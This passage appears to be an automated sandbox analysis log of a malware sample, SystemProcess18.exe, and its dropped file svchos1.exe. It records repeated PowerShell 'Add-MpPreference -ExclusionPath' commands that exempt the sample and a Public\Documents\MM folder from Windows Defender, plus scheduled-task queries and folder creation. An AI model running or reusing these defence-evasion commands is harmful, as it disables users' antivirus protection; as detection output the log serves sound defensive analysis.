          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E13B0 ShellExecuteEx,_access,Sleep,CreateFileA,GetFileSize,MessageBoxA,VirtualAlloc,MessageBoxA,ReadFile,CloseHandle,VirtualFree,MessageBoxA,VirtualFree,CloseHandle,28_2_035E13B0
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
